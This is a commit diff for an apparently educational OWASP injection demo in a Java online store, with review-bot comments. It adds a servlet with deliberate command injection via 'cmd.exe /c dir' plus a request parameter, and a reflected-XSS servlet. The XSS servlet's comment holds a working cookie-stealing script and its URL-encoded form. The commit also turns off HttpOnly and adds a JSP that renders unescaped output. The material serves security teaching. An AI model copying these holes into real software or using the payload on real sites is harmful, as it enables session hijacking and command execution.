Commit f41b6da

OWASP Injection Demo
1 parent 74cd9a8 commit f41b6da

4 files changed

+191
-1
lines changed

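--- /dev/null
+++ b/PATH-NOT-ON-PAGE/CommandInjectionServletDemo.java
@@ -0,0 +1,38 @@
+package com.itbulls.learnit.onlinestore.web.owasp.i.problem;
+
+import jakarta.servlet.http.HttpServlet;
+
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.nio.charset.StandardCharsets;
+import java.util.Scanner;
+
+import jakarta.servlet.ServletException;
+import jakarta.servlet.annotation.WebServlet;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+
+@WebServlet("/comm-inj")
+public class CommandInjectionServletDemo extends HttpServlet {
+
+protected void doGet(HttpServletRequest request, HttpServletResponse response)
+throws ServletException, IOException {
+try {
+String comm = "cmd.exe /c dir " + ".\\products\\"
++ request.getParameter("productCategory");
+Process process = Runtime.getRuntime().exec(comm);
+BufferedReader stdInput = new BufferedReader(
+new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8));
+
+String s = null;
+while ((s = stdInput.readLine()) != null) {
+response.getWriter().println(s);
+}
+} catch (IOException e) {
+System.out.println("Error executing command");
+}
+
+}
+
+}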
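Review bot: The `Process` started on line 24 is never waited for or destroyed and the `BufferedReader` on line 25 is never closed, so every request leaks a child-process handle and its pipes; open the reader in try-with-resources and call `process.waitFor()` after the loop (re-interrupting the thread on `InterruptedException`), and consider `ProcessBuilder.redirectErrorStream(true)` because only stdout is drained and a command that fills the stderr pipe will block. The `catch (IOException e)` on line 32 writes a fixed message to stdout, drops the exception and leaves the response at 200; at minimum call `response.sendError(HttpServletResponse.SC_INTERNAL_SERVER_ERROR)` and log the cause. Since the package is named `problem`, the concatenation of `productCategory` into the command on lines 22–23 appears to be intentional, and a class Javadoc should say so to keep it from being copied: `/** Deliberately vulnerable demo (OWASP A03 Injection): a request parameter is concatenated into a shell command. Not for deployment. */`. `java.util.Scanner` on line 9 is imported but unused, and `doGet` lacks `@Override`.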
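--- /dev/null
+++ b/PATH-NOT-ON-PAGE/ReflectedXssServletDemo.java
@@ -0,0 +1,75 @@
+package com.itbulls.learnit.onlinestore.web.owasp.i.problem;
+
+import jakarta.servlet.http.HttpServlet;
+import java.io.IOException;
+
+import com.itbulls.learnit.onlinestore.core.facades.ProductFacade;
+import com.itbulls.learnit.onlinestore.core.facades.impl.DefaultProductFacade;
+import com.itbulls.learnit.onlinestore.persistence.enteties.Product;
+import com.itbulls.learnit.onlinestore.web.Configurations;
+
+import jakarta.servlet.ServletException;
+import jakarta.servlet.annotation.WebServlet;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+
+/*
+
+Script for Injection
+
+<script>
+function getJSessionId(){
+var jsId = document.cookie.match(/JSESSIONID=[^;]+/);
+if(jsId != null) {
+if (jsId instanceof Array)
+jsId = jsId[0].substring(11);
+else
+jsId = jsId.substring(11);
+}
+return jsId;
+}
+var url = "http://localhost:8080/online-store.web/refl-xss-demo";
+
+var xhr = new XMLHttpRequest();
+xhr.open("POST", url);
+xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
+var params = "sessionId=" + getJSessionId();
+
+xhr.onreadystatechange = function () {
+if (xhr.readyState === 4) {
+console.log(xhr.status);
+console.log(xhr.responseText);
+}};
+
+xhr.send(params);
+</script>
+
+URL with the encoded script
+http://localhost:8080/online-store.web/refl-xss-demo?id=1&discountCoupon=%3Cscript%3E%0Afunction%20getJSessionId%28%29%7B%0A%20%20%20%20var%20jsId%20%3D%20document.cookie.match%28%2FJSESSIONID%3D%5B%5E%3B%5D%2B%2F%29%3B%0A%20%20%20%20if%28jsId%20%21%3D%20null%29%20%7B%0A%20%20%20%20%20%20%20%20if%20%28jsId%20instanceof%20Array%29%0A%20%20%20%20%20%20%20%20%20%20%20%20jsId%20%3D%20jsId%5B0%5D.substring%2811%29%3B%0A%20%20%20%20%20%20%20%20else%0A%20%20%20%20%20%20%20%20%20%20%20%20jsId%20%3D%20jsId.substring%2811%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20return%20jsId%3B%0A%7D%0Avar%20url%20%3D%20%22http%3A%2F%2Flocalhost%3A8080%2Fonline-store.web%2Frefl-xss-demo%22%3B%0A%0Avar%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%0Axhr.open%28%22POST%22%2C%20url%29%3B%0Axhr.setRequestHeader%28%27Content-type%27%2C%20%27application%2Fx-www-form-urlencoded%27%29%3B%0Avar%20params%20%3D%20%22sessionId%3D%22%20%2B%20getJSessionId%28%29%3B%0A%0Axhr.onreadystatechange%20%3D%20function%20%28%29%20%7B%0A%20%20%20if%20%28xhr.readyState%20%3D%3D%3D%204%29%20%7B%0A%20%20%20%20%20%20console.log%28xhr.status%29%3B%0A%20%20%20%20%20%20console.log%28xhr.responseText%29%3B%0A%20%20%20%7D%7D%3B%0A%0Axhr.send%28params%29%3B%0A%3C%2Fscript%3E
+
+*/
+
+
+@WebServlet("/refl-xss-demo")
+public class ReflectedXssServletDemo extends HttpServlet {
+
+private ProductFacade productFacade = DefaultProductFacade.getInstance();
+
+protected void doGet(HttpServletRequest request, HttpServletResponse response)
+throws ServletException, IOException {
+String discountCoupon = request.getParameter("discountCoupon");
+Product p = productFacade.getProductById(Integer.valueOf(request.getParameter("id")));
+
+request.setAttribute("product", p);
+request.setAttribute("discountCoupon", discountCoupon);
+
+request.getRequestDispatcher(Configurations.VIEWS_PATH_RESOLVER + "pdp-xss-demo.jsp").forward(request, response);
+}
+
+protected void doPost(HttpServletRequest request, HttpServletResponse response)
+throws ServletException, IOException {
+System.out.println("***** Cookies received *****");
+System.out.println(request.getParameter("sessionId"));
+}
+
+}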
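Review bot: `Integer.valueOf(request.getParameter("id"))` on line 61 throws `NumberFormatException` when `id` is absent or non-numeric, which reaches the client as an unhandled 500 instead of a 400; validate the parameter and call `response.sendError(HttpServletResponse.SC_BAD_REQUEST)` before the facade lookup. `doPost` on lines 71–72 prints the received `sessionId` parameter verbatim to stdout, so even in this demo the server log ends up holding live session identifiers; print only that a value arrived, e.g. `System.out.println("sessionId parameter received (value not logged)");`. The block comment on lines 16–50 documents the demo payload but nothing marks `discountCoupon` on line 60 as the deliberately unescaped reflected value, so a one-line comment there would help: `// DEMO: passed through unescaped on purpose; the JSP renders it raw`. `productFacade` on line 56 is never reassigned and can be `final`, and both `doGet` and `doPost` lack `@Override`.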

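--- a/online-store.web/src/main/webapp/META-INF/context.xml
+++ b/online-store.web/src/main/webapp/META-INF/context.xml
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<context>
+<context useHttpOnly="false">
 
 
 <Resource name="jdbc/connpool"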
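Review bot: `useHttpOnly="false"` on line 2 removes the HttpOnly flag from the session cookie for the entire web application, not only for the `/refl-xss-demo` servlet, and it overrides Tomcat's default of `true`; nothing in the file records that this is a deliberate weakening, so a later reader is likely to leave it in place. Add a comment directly above the element: `<!-- DEMO ONLY: HttpOnly on JSESSIONID disabled so the reflected-XSS demo can read the cookie from script; remove this attribute outside the demo (Tomcat default is true) -->`. Separately, Tomcat matches the root element name `Context` case-sensitively as far as I recall, so it is worth confirming that the lowercase `<context>` (unchanged by this commit) is actually being parsed and the new attribute takes effect.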
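--- /dev/null
+++ b/PATH-NOT-ON-PAGE/presumed-pdp-xss-demo.jsp
@@ -0,0 +1,77 @@
+<%@ page language="java" contentType="text/html; charset=UTF-8"
+pageEncoding="UTF-8"%>
+<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
+<%@ taglib prefix="shop" tagdir="/WEB-INF/tags/shop"%>
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<title>Product Details Page</title>
+
+<shop:css-imports-main/>
+</head>
+<body>
+
+<shop:header/>
+
+<div class="product-page-main">
+<div class="container">
+<div class="row">
+<div class="col-md-12">
+<div class="prod-page-title">
+<h2>${product.productName}</h2>
+</div>
+</div>
+</div>
+<div class="row">
+
+<div class="col-md-7 col-sm-8">
+<div class="md-prod-page">
+<div class="md-prod-page-in">
+<div class="page-preview">
+<div class="preview">
+<div class="preview-pic tab-content">
+<div class="tab-pane active" id="pic-1"><img src="images/product/${product.imgName}" alt="#" /></div>
+</div>
+</div>
+</div>
+
+</div>
+<div class="description-box">
+<div class="dex-a">
+<h4>Description</h4>
+<p>${product.description}</p>
+</div>
+
+</div>
+</div>
+
+</div>
+
+<div class="col-md-5 col-sm-16">
+<div class="price-box-right">
+<h4>Price</h4>
+<h3>$${product.price}</h3>
+<h3>${discountCoupon}</h3>
+<!-- To avoid XSS - never forget to escape output like in the line below -->
+<!-- <h3><c:out value="${discountCoupon}" escapeXml="true"/> </h3> -->
+<c:if test="${not empty loggedInUser}">
+<a href="checkout?id=${product.id}">Buy</a>
+</c:if>
+<c:if test="${empty loggedInUser}">
+<a href="signin">Buy</a>
+</c:if>
+<h5>${orderStatus}</h5>
+<c:remove var="orderStatus"/>
+
+</div>
+</div>
+
+</div>
+</div>
+</div>
+
+<shop:footer/>
+<shop:js-imports-main/>
+</body>
+</html>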
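Review bot: The comment on lines 56–57 says output must always be escaped but applies that only to `${discountCoupon}`; `${product.productName}` (line 22), `${product.description}` (line 43), `${product.imgName}` (line 34) and `${orderStatus}` (line 64) are rendered with the same unescaped EL. If the demo intends the coupon on line 55 to be the single injectable sink, the other expressions should go through `<c:out value="${...}"/>` so the page demonstrates exactly one vulnerability; `<c:out>` escapes XML by default, so the `escapeXml="true"` on line 57 is redundant. The comment on line 56 should also state that line 55 is left raw on purpose, e.g. `<!-- DEMO: deliberately unescaped reflected parameter (OWASP A03); the escaped form is shown below -->`, so the file is not mistaken for a template to copy.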
